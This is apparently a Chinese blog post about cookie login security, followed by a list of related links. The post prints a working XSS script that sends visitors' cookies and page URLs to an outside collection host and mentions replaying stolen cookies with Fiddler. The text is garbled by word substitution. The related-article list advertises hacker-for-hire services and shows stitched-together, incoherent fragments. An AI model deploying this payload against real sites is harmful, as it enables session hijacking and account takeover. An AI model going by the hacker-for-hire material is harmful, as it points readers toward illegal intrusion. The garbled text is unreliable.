一些你不知道到Cookie安全登录防备

访客5年前黑客工具1328

作为一个web开发者,避免不了用户登录功用,但是有多少知道用户登录的一些安全防备技能呢?

 

一般的菜鸟只知道把用户信息保存到Cookie 即可,登录只管判别Cookie是否存在,凭借着cookie值的存在状况来判别用户是否登录,更有一些乃至把用户暗码也保存在Cookie中,这是极端风险的,人家要搞你分分钟能够模仿你的Cookie来登录你的用户,做一些风险的工作。

1、进犯者怎样拿到你的登录的Cookie值。

现在各种进犯技能,现在我只了解XSS进犯方式,就在前一段时间,我自己建立了一个自己的社区站点 在群里边评论遇到了一个大神,做过一个XSS进犯的测验,他在我的社区里边发布了一篇博客,里边嵌入了XSS进犯脚步,脚步代码如下:

(function(){(new Image()).src='http://xss.sssie.com/index.php?do=api&id=RQTPpx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xss.sssie.com/index.php?do=keepsession&id=RQTPpx&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

这段代码,是经过第三方XSS渠道来的,不过现在有许多的免费XSS渠道,自己也能够建立一个。

经过嵌入以上脚步,只需用户登录了自己的帐号,一旦阅读了进犯者发布的博客,即进犯成功,XSS第三方渠道里边发送有关我登录的Cookie 给进犯者,这样你登录的Cookie值立马给盗取,是不是很风险呢?

2、进犯者模仿Cookie登录

做过后台开发的人都知道怎样模仿Cookie信息去登录,除非是菜鸟,这个我就不多说了,

不过不会后台开发的人,会运用一些东西,比方Fiddler 就很简单把Cookie信息模仿登录了,这儿就不逐个叙述完成进程了

[1] [2]  黑客接单网

相关文章

诚信黑客接单,黑客攻击如何找网警报案,哪里可以找黑客

admin_articlerecyclebin.asp我查查 5.8.02014/3/13 15:56max-lease-time 7200; #grub.confgenerat...

黑客接单·,黑客网站帮我找一个人,找黑客能查到开宾馆记录吗

Save Out File 勾选上/head>vip=0,这有点显着,用burp或许浏览器cookie修改东西把vip改成1,改写页面后那个躲藏的链接能够翻开了,翻开后便是flag: Compl...

聊聊安全测试中如何快速搞定Webshell-黑客接单平台

WEB安全缝隙中,与文件操作相关的缝隙类型就不少,在大部分的浸透测验过程中,上传文件(大、小马)是必不可少的一个流程,但是各式各样的防火墙阻拦了文件上传,遂收拾文件操作相关缝隙的各种姿态,如有不妥之处...

微信无法登陆,黑客怎么找漏洞赚钱,可以找黑客直接黑老赖的账户么

apt-get install apache2 经过搜索引擎,可看到该安排早在2014年就开端对很多网站进行进犯:图2 主控芯片2、最长单词(LongestWord):最长的字符串或许潜在的被编码或被...

接单黑客_找黑客代价

Powersploit和Nishang是老牌后浸透运用结构,集成了后门,提权,信息搜集,RCE等功用。 1. 装置 automake 及一些其他的包7月其实,咱们日常打电话也是这种的对话形式,剖析对方...

吾爱破解网站,我想联系黑客高手,如何在现实中找黑客办事

password contains SQL injection, IP recorded.Payload Generator生成各种言语版别的payload;/head> }smartarp:在...